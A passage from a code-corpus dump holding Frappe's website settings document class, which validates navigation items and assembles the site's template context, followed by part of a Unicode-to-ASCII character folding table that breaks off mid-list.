LAStoolsUtils.runLAStools(commands, progress)
| gpl-2.0 |
indictranstech/reciphergroup-frappe | frappe/website/doctype/website_settings/website_settings.py | 27 | 4297 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.utils import get_request_site_address, encode
from frappe.model.document import Document
from urllib import quote
from frappe.website.router import resolve_route
from frappe.website.doctype.website_theme.website_theme import add_website_theme
class WebsiteSettings(Document):
def validate(self):
self.validate_top_bar_items()
self.validate_footer_items()
self.validate_home_page()
def validate_home_page(self):
if frappe.flags.in_install:
return
if self.home_page and not resolve_route(self.home_page):
frappe.msgprint(_("Invalid Home Page") + " (Standard pages - index, login, products, blog, about, contact)")
self.home_page = ''
def validate_top_bar_items(self):
"""validate url in top bar items"""
for top_bar_item in self.get("top_bar_items"):
if top_bar_item.parent_label:
parent_label_item = self.get("top_bar_items", {"label": top_bar_item.parent_label})
if not parent_label_item:
# invalid item
frappe.throw(_("{0} does not exist in row {1}").format(top_bar_item.parent_label, top_bar_item.idx))
elif not parent_label_item[0] or parent_label_item[0].url:
# parent cannot have url
frappe.throw(_("{0} in row {1} cannot have both URL and child items").format(top_bar_item.parent_label,
top_bar_item.idx))
def validate_footer_items(self):
"""clear parent label in footer"""
for footer_item in self.get("footer_items"):
footer_item.parent_label = None
def on_update(self):
self.clear_cache()
def clear_cache(self):
# make js and css
# clear web cache (for menus!)
from frappe.sessions import clear_cache
clear_cache('Guest')
from frappe.website.render import clear_cache
clear_cache()
# clears role based home pages
frappe.clear_cache()
def get_website_settings():
hooks = frappe.get_hooks()
all_top_items = frappe.db.sql("""\
select * from `tabTop Bar Item`
where parent='Website Settings' and parentfield='top_bar_items'
order by idx asc""", as_dict=1)
top_items = [d for d in all_top_items if not d['parent_label']]
# attach child items to top bar
for d in all_top_items:
if d['parent_label']:
for t in top_items:
if t['label']==d['parent_label']:
if not 'child_items' in t:
t['child_items'] = []
t['child_items'].append(d)
break
context = frappe._dict({
'top_bar_items': top_items,
'footer_items': frappe.db.sql("""\
select * from `tabTop Bar Item`
where parent='Website Settings' and parentfield='footer_items'
order by idx asc""", as_dict=1),
"post_login": [
{"label": "My Account", "url": "/me"},
{"class": "divider"},
{"label": "Logout", "url": "/?cmd=web_logout"}
]
})
settings = frappe.get_doc("Website Settings", "Website Settings")
for k in ["banner_html", "brand_html", "copyright", "twitter_share_via",
"facebook_share", "google_plus_one", "twitter_share", "linked_in_share",
"disable_signup", "hide_footer_signup", "head_html"]:
if hasattr(settings, k):
context[k] = settings.get(k)
if settings.address:
context["footer_address"] = settings.address
for k in ["facebook_share", "google_plus_one", "twitter_share", "linked_in_share",
"disable_signup"]:
context[k] = int(context.get(k) or 0)
if frappe.request:
context.url = quote(str(get_request_site_address(full_address=True)), safe="/:")
context.encoded_title = quote(encode(context.title or ""), str(""))
for update_website_context in hooks.update_website_context or []:
frappe.get_attr(update_website_context)(context)
context.web_include_js = hooks.web_include_js or []
context.web_include_css = hooks.web_include_css or []
via_hooks = frappe.get_hooks("website_context")
for key in via_hooks:
context[key] = via_hooks[key]
if key not in ("top_bar_items", "footer_items", "post_login") \
and isinstance(context[key], (list, tuple)):
context[key] = context[key][0]
add_website_theme(context)
if not context.get("favicon"):
context["favicon"] = "/assets/frappe/images/favicon.png"
if settings.favicon and settings.favicon != "attach_files:":
context["favicon"] = settings.favicon
return context
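# Sketch of how another app can hook into the context assembled above (app and
# module names are hypothetical):
#
#   # hooks.py of a custom app
#   update_website_context = ["custom_app.utils.website_context"]
#
#   # custom_app/utils.py
#   def website_context(context):
#       context["banner_html"] = "<div>Scheduled maintenance tonight</div>"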
| mit |
hzlf/openbroadcast.org | website/base/utils/fold_to_ascii/mapping.py | 2 | 27241 | # -*- coding: utf-8 -*-
"""
Mappings suitable for translate tables.
"""
# To see printed representation of character `k`:
# print(unichr(k))
#
# ASCII characters replace to themselves.
codepoint_to_self = [
(0x0, u"\x00"),
(0x1, u"\x01"),
(0x2, u"\x02"),
(0x3, u"\x03"),
(0x4, u"\x04"),
(0x5, u"\x05"),
(0x6, u"\x06"),
(0x7, u"\x07"),
(0x8, u"\x08"),
(0x9, u"\t"),
(0xA, u"\n"),
(0xB, u"\x0b"),
(0xC, u"\x0c"),
(0xD, u"\r"),
(0xE, u"\x0e"),
(0xF, u"\x0f"),
(0x10, u"\x10"),
(0x11, u"\x11"),
(0x12, u"\x12"),
(0x13, u"\x13"),
(0x14, u"\x14"),
(0x15, u"\x15"),
(0x16, u"\x16"),
(0x17, u"\x17"),
(0x18, u"\x18"),
(0x19, u"\x19"),
(0x1A, u"\x1a"),
(0x1B, u"\x1b"),
(0x1C, u"\x1c"),
(0x1D, u"\x1d"),
(0x1E, u"\x1e"),
(0x1F, u"\x1f"),
(0x20, u" "),
(0x21, u"!"),
(0x22, u'"'),
(0x23, u"#"),
(0x24, u"$"),
(0x25, u"%"),
(0x26, u"&"),
(0x27, u"'"),
(0x28, u"("),
(0x29, u")"),
(0x2A, u"*"),
(0x2B, u"+"),
(0x2C, u","),
(0x2D, u"-"),
(0x2E, u"."),
(0x2F, u"/"),
(0x30, u"0"),
(0x31, u"1"),
(0x32, u"2"),
(0x33, u"3"),
(0x34, u"4"),
(0x35, u"5"),
(0x36, u"6"),
(0x37, u"7"),
(0x38, u"8"),
(0x39, u"9"),
(0x3A, u":"),
(0x3B, u";"),
(0x3C, u"<"),
(0x3D, u"="),
(0x3E, u">"),
(0x3F, u"?"),
(0x40, u"@"),
(0x41, u"A"),
(0x42, u"B"),
(0x43, u"C"),
(0x44, u"D"),
(0x45, u"E"),
(0x46, u"F"),
(0x47, u"G"),
(0x48, u"H"),
(0x49, u"I"),
(0x4A, u"J"),
(0x4B, u"K"),
(0x4C, u"L"),
(0x4D, u"M"),
(0x4E, u"N"),
(0x4F, u"O"),
(0x50, u"P"),
(0x51, u"Q"),
(0x52, u"R"),
(0x53, u"S"),
(0x54, u"T"),
(0x55, u"U"),
(0x56, u"V"),
(0x57, u"W"),
(0x58, u"X"),
(0x59, u"Y"),
(0x5A, u"Z"),
(0x5B, u"["),
(0x5C, u"\\"),
(0x5D, u"]"),
(0x5E, u"^"),
(0x5F, u"_"),
(0x60, u"`"),
(0x61, u"a"),
(0x62, u"b"),
(0x63, u"c"),
(0x64, u"d"),
(0x65, u"e"),
(0x66, u"f"),
(0x67, u"g"),
(0x68, u"h"),
(0x69, u"i"),
(0x6A, u"j"),
(0x6B, u"k"),
(0x6C, u"l"),
(0x6D, u"m"),
(0x6E, u"n"),
(0x6F, u"o"),
(0x70, u"p"),
(0x71, u"q"),
(0x72, u"r"),
(0x73, u"s"),
(0x74, u"t"),
(0x75, u"u"),
(0x76, u"v"),
(0x77, u"w"),
(0x78, u"x"),
(0x79, u"y"),
(0x7A, u"z"),
(0x7B, u"{"),
(0x7C, u"|"),
(0x7D, u"}"),
(0x7E, u"~"),
]
codepoint_to_replacement = [
(0xC0, u"A"),
(0xC1, u"A"),
(0xC2, u"A"),
(0xC3, u"A"),
(0xC4, u"A"),
(0xC5, u"A"),
(0x100, u"A"),
(0x102, u"A"),
(0x104, u"A"),
(0x18F, u"A"),
(0x1CD, u"A"),
(0x1DE, u"A"),
(0x1E0, u"A"),
(0x1FA, u"A"),
(0x200, u"A"),
(0x202, u"A"),
(0x226, u"A"),
(0x23A, u"A"),
(0x1D00, u"A"),
(0x1E00, u"A"),
(0x1EA0, u"A"),
(0x1EA2, u"A"),
(0x1EA4, u"A"),
(0x1EA6, u"A"),
(0x1EA8, u"A"),
(0x1EAA, u"A"),
(0x1EAC, u"A"),
(0x1EAE, u"A"),
(0x1EB0, u"A"),
(0x1EB2, u"A"),
(0x1EB4, u"A"),
(0x1EB6, u"A"),
(0x24B6, u"A"),
(0xFF21, u"A"),
(0xE0, u"a"),
(0xE1, u"a"),
(0xE2, u"a"),
(0xE3, u"a"),
(0xE4, u"a"),
(0xE5, u"a"),
(0x101, u"a"),
(0x103, u"a"),
(0x105, u"a"),
(0x1CE, u"a"),
(0x1DF, u"a"),
(0x1E1, u"a"),
(0x1FB, u"a"),
(0x201, u"a"),
(0x203, u"a"),
(0x227, u"a"),
(0x250, u"a"),
(0x259, u"a"),
(0x25A, u"a"),
(0x1D8F, u"a"),
(0x1D95, u"a"),
(0x1E01, u"a"),
(0x1E9A, u"a"),
(0x1EA1, u"a"),
(0x1EA3, u"a"),
(0x1EA5, u"a"),
(0x1EA7, u"a"),
(0x1EA9, u"a"),
(0x1EAB, u"a"),
(0x1EAD, u"a"),
(0x1EAF, u"a"),
(0x1EB1, u"a"),
(0x1EB3, u"a"),
(0x1EB5, u"a"),
(0x1EB7, u"a"),
(0x2090, u"a"),
(0x2094, u"a"),
(0x24D0, u"a"),
(0x2C65, u"a"),
(0x2C6F, u"a"),
(0xFF41, u"a"),
(0xA732, u"AA"),
(0xC6, u"AE"),
(0x1E2, u"AE"),
(0x1FC, u"AE"),
(0x1D01, u"AE"),
(0xA734, u"AO"),
(0xA736, u"AU"),
(0xA738, u"AV"),
(0xA73A, u"AV"),
(0xA73C, u"AY"),
(0x249C, u"(a)"),
(0xA733, u"aa"),
(0xE6, u"ae"),
(0x1E3, u"ae"),
(0x1FD, u"ae"),
(0x1D02, u"ae"),
(0xA735, u"ao"),
(0xA737, u"au"),
(0xA739, u"av"),
(0xA73B, u"av"),
(0xA73D, u"ay"),
(0x181, u"B"),
(0x182, u"B"),
(0x243, u"B"),
(0x299, u"B"),
(0x1D03, u"B"),
(0x1E02, u"B"),
(0x1E04, u"B"),
(0x1E06, u"B"),
(0x24B7, u"B"),
(0xFF22, u"B"),
(0x180, u"b"),
(0x183, u"b"),
(0x253, u"b"),
(0x1D6C, u"b"),
(0x1D80, u"b"),
(0x1E03, u"b"),
(0x1E05, u"b"),
(0x1E07, u"b"),
(0x24D1, u"b"),
(0xFF42, u"b"),
(0x249D, u"(b)"),
(0xC7, u"C"),
(0x106, u"C"),
(0x108, u"C"),
(0x10A, u"C"),
(0x10C, u"C"),
(0x187, u"C"),
(0x23B, u"C"),
(0x297, u"C"),
(0x1D04, u"C"),
(0x1E08, u"C"),
(0x24B8, u"C"),
(0xFF23, u"C"),
(0xE7, u"c"),
(0x107, u"c"),
(0x109, u"c"),
(0x10B, u"c"),
(0x10D, u"c"),
(0x188, u"c"),
(0x23C, u"c"),
(0x255, u"c"),
(0x1E09, u"c"),
(0x2184, u"c"),
(0x24D2, u"c"),
(0xA73E, u"c"),
(0xA73F, u"c"),
(0xFF43, u"c"),
(0x249E, u"(c)"),
(0xD0, u"D"),
(0x10E, u"D"),
(0x110, u"D"),
(0x189, u"D"),
(0x18A, u"D"),
(0x18B, u"D"),
(0x1D05, u"D"),
(0x1D06, u"D"),
(0x1E0A, u"D"),
(0x1E0C, u"D"),
(0x1E0E, u"D"),
(0x1E10, u"D"),
(0x1E12, u"D"),
(0x24B9, u"D"),
(0xA779, u"D"),
(0xFF24, u"D"),
(0xF0, u"d"),
(0x10F, u"d"),
(0x111, u"d"),
(0x18C, u"d"),
(0x221, u"d"),
(0x256, u"d"),
(0x257, u"d"),
(0x1D6D, u"d"),
(0x1D81, u"d"),
(0x1D91, u"d"),
(0x1E0B, u"d"),
(0x1E0D, u"d"),
(0x1E0F, u"d"),
(0x1E11, u"d"),
(0x1E13, u"d"),
(0x24D3, u"d"),
(0xA77A, u"d"),
(0xFF44, u"d"),
(0x1C4, u"DZ"),
(0x1F1, u"DZ"),
(0x1C5, u"Dz"),
(0x1F2, u"Dz"),
(0x249F, u"(d)"),
(0x238, u"db"),
(0x1C6, u"dz"),
(0x1F3, u"dz"),
(0x2A3, u"dz"),
(0x2A5, u"dz"),
(0xC8, u"E"),
(0xC9, u"E"),
(0xCA, u"E"),
(0xCB, u"E"),
(0x112, u"E"),
(0x114, u"E"),
(0x116, u"E"),
(0x118, u"E"),
(0x11A, u"E"),
(0x18E, u"E"),
(0x190, u"E"),
(0x204, u"E"),
(0x206, u"E"),
(0x228, u"E"),
(0x246, u"E"),
(0x1D07, u"E"),
(0x1E14, u"E"),
(0x1E16, u"E"),
(0x1E18, u"E"),
(0x1E1A, u"E"),
(0x1E1C, u"E"),
(0x1EB8, u"E"),
(0x1EBA, u"E"),
(0x1EBC, u"E"),
(0x1EBE, u"E"),
(0x1EC0, u"E"),
(0x1EC2, u"E"),
(0x1EC4, u"E"),
(0x1EC6, u"E"),
(0x24BA, u"E"),
(0x2C7B, u"E"),
(0xFF25, u"E"),
(0xE8, u"e"),
(0xE9, u"e"),
(0xEA, u"e"),
(0xEB, u"e"),
(0x113, u"e"),
(0x115, u"e"),
(0x117, u"e"),
(0x119, u"e"),
(0x11B, u"e"),
(0x1DD, u"e"),
(0x205, u"e"),
(0x207, u"e"),
(0x229, u"e"),
(0x247, u"e"),
(0x258, u"e"),
(0x25B, u"e"),
(0x25C, u"e"),
(0x25D, u"e"),
(0x25E, u"e"),
(0x29A, u"e"),
(0x1D08, u"e"),
(0x1D92, u"e"),
(0x1D93, u"e"),
(0x1D94, u"e"),
(0x1E15, u"e"),
(0x1E17, u"e"),
(0x1E19, u"e"),
(0x1E1B, u"e"),
(0x1E1D, u"e"),
(0x1EB9, u"e"),
(0x1EBB, u"e"),
(0x1EBD, u"e"),
(0x1EBF, u"e"),
(0x1EC1, u"e"),
(0x1EC3, u"e"),
(0x1EC5, u"e"),
(0x1EC7, u"e"),
(0x2091, u"e"),
(0x24D4, u"e"),
(0x2C78, u"e"),
(0xFF45, u"e"),
(0x24A0, u"(e)"),
(0x191, u"F"),
(0x1E1E, u"F"),
(0x24BB, u"F"),
(0xA730, u"F"),
(0xA77B, u"F"),
(0xA7FB, u"F"),
(0xFF26, u"F"),
(0x192, u"f"),
(0x1D6E, u"f"),
(0x1D82, u"f"),
(0x1E1F, u"f"),
(0x1E9B, u"f"),
(0x24D5, u"f"),
(0xA77C, u"f"),
(0xFF46, u"f"),
(0x24A1, u"(f)"),
(0xFB00, u"ff"),
(0xFB03, u"ffi"),
(0xFB04, u"ffl"),
(0xFB01, u"fi"),
(0xFB02, u"fl"),
(0x11C, u"G"),
(0x11E, u"G"),
(0x120, u"G"),
(0x122, u"G"),
(0x193, u"G"),
(0x1E4, u"G"),
(0x1E5, u"G"),
(0x1E6, u"G"),
(0x1E7, u"G"),
(0x1F4, u"G"),
(0x262, u"G"),
(0x29B, u"G"),
(0x1E20, u"G"),
(0x24BC, u"G"),
(0xA77D, u"G"),
(0xA77E, u"G"),
(0xFF27, u"G"),
(0x11D, u"g"),
(0x11F, u"g"),
(0x121, u"g"),
(0x123, u"g"),
(0x1F5, u"g"),
(0x260, u"g"),
(0x261, u"g"),
(0x1D77, u"g"),
(0x1D79, u"g"),
(0x1D83, u"g"),
(0x1E21, u"g"),
(0x24D6, u"g"),
(0xA77F, u"g"),
(0xFF47, u"g"),
(0x24A2, u"(g)"),
(0x124, u"H"),
(0x126, u"H"),
(0x21E, u"H"),
(0x29C, u"H"),
(0x1E22, u"H"),
(0x1E24, u"H"),
(0x1E26, u"H"),
(0x1E28, u"H"),
(0x1E2A, u"H"),
(0x24BD, u"H"),
(0x2C67, u"H"),
(0x2C75, u"H"),
(0xFF28, u"H"),
(0x125, u"h"),
(0x127, u"h"),
(0x21F, u"h"),
(0x265, u"h"),
(0x266, u"h"),
(0x2AE, u"h"),
(0x2AF, u"h"),
(0x1E23, u"h"),
(0x1E25, u"h"),
(0x1E27, u"h"),
(0x1E29, u"h"),
(0x1E2B, u"h"),
(0x1E96, u"h"),
(0x24D7, u"h"),
(0x2C68, u"h"),
(0x2C76, u"h"),
(0xFF48, u"h"),
(0x1F6, u"HV"),
(0x24A3, u"(h)"),
(0x195, u"hv"),
(0xCC, u"I"),
(0xCD, u"I"),
(0xCE, u"I"),
(0xCF, u"I"),
(0x128, u"I"),
(0x12A, u"I"),
(0x12C, u"I"),
(0x12E, u"I"),
(0x130, u"I"),
(0x196, u"I"),
(0x197, u"I"),
(0x1CF, u"I"),
(0x208, u"I"),
(0x20A, u"I"),
(0x26A, u"I"),
(0x1D7B, u"I"),
(0x1E2C, u"I"),
(0x1E2E, u"I"),
(0x1EC8, u"I"),
(0x1ECA, u"I"),
(0x24BE, u"I"),
(0xA7FE, u"I"),
(0xFF29, u"I"),
(0xEC, u"i"),
(0xED, u"i"),
(0xEE, u"i"),
(0xEF, u"i"),
(0x129, u"i"),
(0x12B, u"i"),
(0x12D, u"i"),
(0x12F, u"i"),
(0x131, u"i"),
(0x1D0, u"i"),
(0x209, u"i"),
(0x20B, u"i"),
(0x268, u"i"),
(0x1D09, u"i"),
(0x1D62, u"i"),
(0x1D7C, u"i"),
(0x1D96, u"i"),
(0x1E2D, u"i"),
(0x1E2F, u"i"),
(0x1EC9, u"i"),
(0x1ECB, u"i"),
(0x2071, u"i"),
(0x24D8, u"i"),
(0xFF49, u"i"),
(0x132, u"IJ"),
(0x24A4, u"(i)"),
(0x133, u"ij"),
(0x134, u"J"),
(0x248, u"J"),
(0x1D0A, u"J"),
(0x24BF, u"J"),
(0xFF2A, u"J"),
(0x135, u"j"),
(0x1F0, u"j"),
(0x237, u"j"),
(0x249, u"j"),
(0x25F, u"j"),
(0x284, u"j"),
(0x29D, u"j"),
(0x24D9, u"j"),
(0x2C7C, u"j"),
(0xFF4A, u"j"),
(0x24A5, u"(j)"),
(0x136, u"K"),
(0x198, u"K"),
(0x1E8, u"K"),
(0x1D0B, u"K"),
(0x1E30, u"K"),
(0x1E32, u"K"),
(0x1E34, u"K"),
(0x24C0, u"K"),
(0x2C69, u"K"),
(0xA740, u"K"),
(0xA742, u"K"),
(0xA744, u"K"),
(0xFF2B, u"K"),
(0x137, u"k"),
(0x199, u"k"),
(0x1E9, u"k"),
(0x29E, u"k"),
(0x1D84, u"k"),
(0x1E31, u"k"),
(0x1E33, u"k"),
(0x1E35, u"k"),
(0x24DA, u"k"),
(0x2C6A, u"k"),
(0xA741, u"k"),
(0xA743, u"k"),
(0xA745, u"k"),
(0xFF4B, u"k"),
(0x24A6, u"(k)"),
(0x139, u"L"),
(0x13B, u"L"),
(0x13D, u"L"),
(0x13F, u"L"),
(0x141, u"L"),
(0x23D, u"L"),
(0x29F, u"L"),
(0x1D0C, u"L"),
(0x1E36, u"L"),
(0x1E38, u"L"),
(0x1E3A, u"L"),
(0x1E3C, u"L"),
(0x24C1, u"L"),
(0x2C60, u"L"),
(0x2C62, u"L"),
(0xA746, u"L"),
(0xA748, u"L"),
(0xA780, u"L"),
(0xFF2C, u"L"),
(0x13A, u"l"),
(0x13C, u"l"),
(0x13E, u"l"),
(0x140, u"l"),
(0x142, u"l"),
(0x19A, u"l"),
(0x234, u"l"),
(0x26B, u"l"),
(0x26C, u"l"),
(0x26D, u"l"),
(0x1D85, u"l"),
(0x1E37, u"l"),
(0x1E39, u"l"),
(0x1E3B, u"l"),
(0x1E3D, u"l"),
(0x24DB, u"l"),
(0x2C61, u"l"),
(0xA747, u"l"),
(0xA749, u"l"),
(0xA781, u"l"),
(0xFF4C, u"l"),
(0x1C7, u"LJ"),
(0x1EFA, u"LL"),
(0x1C8, u"Lj"),
(0x24A7, u"(l)"),
(0x1C9, u"lj"),
(0x1EFB, u"ll"),
(0x2AA, u"ls"),
(0x2AB, u"lz"),
(0x19C, u"M"),
(0x1D0D, u"M"),
(0x1E3E, u"M"),
(0x1E40, u"M"),
(0x1E42, u"M"),
(0x24C2, u"M"),
(0x2C6E, u"M"),
(0xA7FD, u"M"),
(0xA7FF, u"M"),
(0xFF2D, u"M"),
(0x26F, u"m"),
(0x270, u"m"),
(0x271, u"m"),
(0x1D6F, u"m"),
(0x1D86, u"m"),
(0x1E3F, u"m"),
(0x1E41, u"m"),
(0x1E43, u"m"),
(0x24DC, u"m"),
(0xFF4D, u"m"),
(0x24A8, u"(m)"),
(0xD1, u"N"),
(0x143, u"N"),
(0x145, u"N"),
(0x147, u"N"),
(0x14A, u"N"),
(0x19D, u"N"),
(0x1F8, u"N"),
(0x220, u"N"),
(0x274, u"N"),
(0x1D0E, u"N"),
(0x1E44, u"N"),
(0x1E46, u"N"),
(0x1E48, u"N"),
(0x1E4A, u"N"),
(0x24C3, u"N"),
(0xFF2E, u"N"),
(0xF1, u"n"),
(0x144, u"n"),
(0x146, u"n"),
(0x148, u"n"),
(0x149, u"n"),
(0x14B, u"n"),
(0x19E, u"n"),
(0x1F9, u"n"),
(0x235, u"n"),
(0x272, u"n"),
(0x273, u"n"),
(0x1D70, u"n"),
(0x1D87, u"n"),
(0x1E45, u"n"),
(0x1E47, u"n"),
(0x1E49, u"n"),
(0x1E4B, u"n"),
(0x207F, u"n"),
(0x24DD, u"n"),
(0xFF4E, u"n"),
(0x1CA, u"NJ"),
(0x1CB, u"Nj"),
(0x24A9, u"(n)"),
(0x1CC, u"nj"),
(0xD2, u"O"),
(0xD3, u"O"),
(0xD4, u"O"),
(0xD5, u"O"),
(0xD6, u"O"),
(0xD8, u"O"),
(0x14C, u"O"),
(0x14E, u"O"),
(0x150, u"O"),
(0x186, u"O"),
(0x19F, u"O"),
(0x1A0, u"O"),
(0x1D1, u"O"),
(0x1EA, u"O"),
(0x1EC, u"O"),
(0x1FE, u"O"),
(0x20C, u"O"),
(0x20E, u"O"),
(0x22A, u"O"),
(0x22C, u"O"),
(0x22E, u"O"),
(0x230, u"O"),
(0x1D0F, u"O"),
(0x1D10, u"O"),
(0x1E4C, u"O"),
(0x1E4E, u"O"),
(0x1E50, u"O"),
(0x1E52, u"O"),
(0x1ECC, u"O"),
(0x1ECE, u"O"),
(0x1ED0, u"O"),
(0x1ED2, u"O"),
(0x1ED4, u"O"),
(0x1ED6, u"O"),
(0x1ED8, u"O"),
(0x1EDA, u"O"),
(0x1EDC, u"O"),
(0x1EDE, u"O"),
(0x1EE0, u"O"),
(0x1EE2, u"O"),
(0x24C4, u"O"),
(0xA74A, u"O"),
(0xA74C, u"O"),
(0xFF2F, u"O"),
(0xF2, u"o"),
(0xF3, u"o"),
(0xF4, u"o"),
(0xF5, u"o"),
(0xF6, u"o"),
(0xF8, u"o"),
(0x14D, u"o"),
(0x14F, u"o"),
(0x151, u"o"),
(0x1A1, u"o"),
(0x1D2, u"o"),
(0x1EB, u"o"),
(0x1ED, u"o"),
(0x1FF, u"o"),
(0x20D, u"o"),
(0x20F, u"o"),
(0x22B, u"o"),
(0x22D, u"o"),
(0x22F, u"o"),
(0x231, u"o"),
(0x254, u"o"),
(0x275, u"o"),
(0x1D16, u"o"),
(0x1D17, u"o"),
(0x1D97, u"o"),
(0x1E4D, u"o"),
(0x1E4F, u"o"),
(0x1E51, u"o"),
(0x1E53, u"o"),
(0x1ECD, u"o"),
(0x1ECF, u"o"),
(0x1ED1, u"o"),
(0x1ED3, u"o"),
(0x1ED5, u"o"),
(0x1ED7, u"o"),
(0x1ED9, u"o"),
(0x1EDB, u"o"),
(0x1EDD, u"o"),
(0x1EDF, u"o"),
(0x1EE1, u"o"),
(0x1EE3, u"o"),
(0x2092, u"o"),
(0x24DE, u"o"),
(0x2C7A, u"o"),
(0xA74B, u"o"),
(0xA74D, u"o"),
(0xFF4F, u"o"),
(0x152, u"OE"),
(0x276, u"OE"),
(0xA74E, u"OO"),
(0x222, u"OU"),
(0x1D15, u"OU"),
(0x24AA, u"(o)"),
(0x153, u"oe"),
(0x1D14, u"oe"),
(0xA74F, u"oo"),
(0x223, u"ou"),
(0x1A4, u"P"),
(0x1D18, u"P"),
(0x1E54, u"P"),
(0x1E56, u"P"),
(0x24C5, u"P"),
(0x2C63, u"P"),
(0xA750, u"P"),
(0xA752, u"P"),
(0xA754, u"P"),
(0xFF30, u"P"),
(0x1A5, u"p"),
(0x1D71, u"p"),
(0x1D7D, u"p"),
(0x1D88, u"p"),
(0x1E55, u"p"),
(0x1E57, u"p"),
(0x24DF, u"p"),
(0xA751, u"p"),
(0xA753, u"p"),
(0xA755, u"p"),
(0xA7FC, u"p"),
(0xFF50, u"p"),
(0x24AB, u"(p)"),
(0x24A, u"Q"),
(0x24C6, u"Q"),
(0xA756, u"Q"),
(0xA758, u"Q"),
(0xFF31, u"Q"),
(0x138, u"q"),
(0x24B, u"q"),
(0x2A0, u"q"),
(0x24E0, u"q"),
(0xA757, u"q"),
(0xA759, u"q"),
(0xFF51, u"q"),
(0x24AC, u"(q)"),
(0x239, u"qp"),
(0x154, u"R"),
(0x156, u"R"),
(0x158, u"R"),
(0x210, u"R"),
(0x212, u"R"),
(0x24C, u"R"),
(0x280, u"R"),
(0x281, u"R"),
(0x1D19, u"R"),
(0x1D1A, u"R"),
(0x1E58, u"R"),
(0x1E5A, u"R"),
(0x1E5C, u"R"),
(0x1E5E, u"R"),
(0x24C7, u"R"),
(0x2C64, u"R"),
(0xA75A, u"R"),
(0xA782, u"R"),
(0xFF32, u"R"),
(0x155, u"r"),
(0x157, u"r"),
(0x159, u"r"),
(0x211, u"r"),
(0x213, u"r"),
(0x24D, u"r"),
(0x27C, u"r"),
(0x27D, u"r"),
(0x27E, u"r"),
(0x27F, u"r"),
(0x1D63, u"r"),
(0x1D72, u"r"),
(0x1D73, u"r"),
(0x1D89, u"r"),
(0x1E59, u"r"),
(0x1E5B, u"r"),
(0x1E5D, u"r"),
(0x1E5F, u"r"),
(0x24E1, u"r"),
(0xA75B, u"r"),
(0xA783, u"r"),
(0xFF52, u"r"),
(0x24AD, u"(r)"),
(0x15A, u"S"),
(0x15C, u"S"),
(0x15E, u"S"),
(0x160, u"S"),
(0x218, u"S"),
(0x1E60, u"S"),
(0x1E62, u"S"),
(0x1E64, u"S"),
(0x1E66, u"S"),
(0x1E68, u"S"),
(0x24C8, u"S"),
(0xA731, u"S"),
(0xA785, u"S"),
(0xFF33, u"S"),
(0x15B, u"s"),
(0x15D, u"s"),
(0x15F, u"s"),
(0x161, u"s"),
(0x17F, u"s"),
(0x219, u"s"),
(0x23F, u"s"),
(0x282, u"s"),
(0x1D74, u"s"),
(0x1D8A, u"s"),
(0x1E61, u"s"),
(0x1E63, u"s"),
(0x1E65, u"s"),
(0x1E67, u"s"),
(0x1E69, u"s"),
(0x1E9C, u"s"),
(0x1E9D, u"s"),
(0x24E2, u"s"),
(0xA784, u"s"),
(0xFF53, u"s"),
(0x1E9E, u"SS"),
(0x24AE, u"(s)"),
(0xDF, u"ss"),
(0xFB06, u"st"),
(0x162, u"T"),
(0x164, u"T"),
(0x166, u"T"),
(0x1AC, u"T"),
(0x1AE, u"T"),
(0x21A, u"T"),
(0x23E, u"T"),
(0x1D1B, u"T"),
(0x1E6A, u"T"),
(0x1E6C, u"T"),
(0x1E6E, u"T"),
(0x1E70, u"T"),
(0x24C9, u"T"),
(0xA786, u"T"),
(0xFF34, u"T"),
(0x163, u"t"),
(0x165, u"t"),
(0x167, u"t"),
(0x1AB, u"t"),
(0x1AD, u"t"),
(0x21B, u"t"),
(0x236, u"t"),
(0x287, u"t"),
(0x288, u"t"),
(0x1D75, u"t"),
(0x1E6B, u"t"),
(0x1E6D, u"t"),
(0x1E6F, u"t"),
(0x1E71, u"t"),
(0x1E97, u"t"),
(0x24E3, u"t"),
(0x2C66, u"t"),
(0xFF54, u"t"),
(0xDE, u"TH"),
(0xA766, u"TH"),
(0xA728, u"TZ"),
(0x24AF, u"(t)"),
(0x2A8, u"tc"),
(0xFE, u"th"),
(0x1D7A, u"th"),
(0xA767, u"th"),
(0x2A6, u"ts"),
(0xA729, u"tz"),
(0xD9, u"U"),
(0xDA, u"U"),
(0xDB, u"U"),
(0xDC, u"U"),
(0x168, u"U"),
(0x16A, u"U"),
(0x16C, u"U"),
(0x16E, u"U"),
(0x170, u"U"),
(0x172, u"U"),
(0x1AF, u"U"),
(0x1D3, u"U"),
(0x1D5, u"U"),
(0x1D7, u"U"),
(0x1D9, u"U"),
(0x1DB, u"U"),
(0x214, u"U"),
(0x216, u"U"),
(0x244, u"U"),
(0x1D1C, u"U"),
(0x1D7E, u"U"),
(0x1E72, u"U"),
(0x1E74, u"U"),
(0x1E76, u"U"),
(0x1E78, u"U"),
(0x1E7A, u"U"),
(0x1EE4, u"U"),
(0x1EE6, u"U"),
(0x1EE8, u"U"),
(0x1EEA, u"U"),
(0x1EEC, u"U"),
(0x1EEE, u"U"),
(0x1EF0, u"U"),
(0x24CA, u"U"),
(0xFF35, u"U"),
(0xF9, u"u"),
(0xFA, u"u"),
(0xFB, u"u"),
(0xFC, u"u"),
(0x169, u"u"),
(0x16B, u"u"),
(0x16D, u"u"),
(0x16F, u"u"),
(0x171, u"u"),
(0x173, u"u"),
(0x1B0, u"u"),
(0x1D4, u"u"),
(0x1D6, u"u"),
(0x1D8, u"u"),
(0x1DA, u"u"),
(0x1DC, u"u"),
(0x215, u"u"),
(0x217, u"u"),
(0x289, u"u"),
(0x1D64, u"u"),
(0x1D99, u"u"),
(0x1E73, u"u"),
(0x1E75, u"u"),
(0x1E77, u"u"),
(0x1E79, u"u"),
(0x1E7B, u"u"),
(0x1EE5, u"u"),
(0x1EE7, u"u"),
(0x1EE9, u"u"),
(0x1EEB, u"u"),
(0x1EED, u"u"),
(0x1EEF, u"u"),
(0x1EF1, u"u"),
(0x24E4, u"u"),
(0xFF55, u"u"),
(0x24B0, u"(u)"),
(0x1D6B, u"ue"),
(0x1B2, u"V"),
(0x245, u"V"),
(0x1D20, u"V"),
(0x1E7C, u"V"),
(0x1E7E, u"V"),
(0x1EFC, u"V"),
(0x24CB, u"V"),
(0xA75E, u"V"),
(0xA768, u"V"),
(0xFF36, u"V"),
(0x28B, u"v"),
(0x28C, u"v"),
(0x1D65, u"v"),
(0x1D8C, u"v"),
(0x1E7D, u"v"),
(0x1E7F, u"v"),
(0x24E5, u"v"),
